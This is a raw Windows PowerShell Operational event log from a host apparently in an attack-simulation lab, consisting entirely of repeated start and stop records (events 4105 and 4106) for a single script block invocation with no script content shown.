ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471061
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471060
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471059
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471058
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471057
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471056
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471055
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471054
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471053
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471052
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471051
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471050
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471049
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471048
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471047
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471046
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471045
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471044
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471043
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471042
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471041
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471040
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471039
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471038
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471037
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471036
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471035
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471034
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471033
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471032
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471031
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471030
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471029
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471028
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471027
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471026
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471025
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471024
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471023
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471022
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471021
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471020
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471019
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471018
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471017
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471016
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471015
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471014
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471013
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471012
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471011
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471010
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471009
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471008
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471007
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
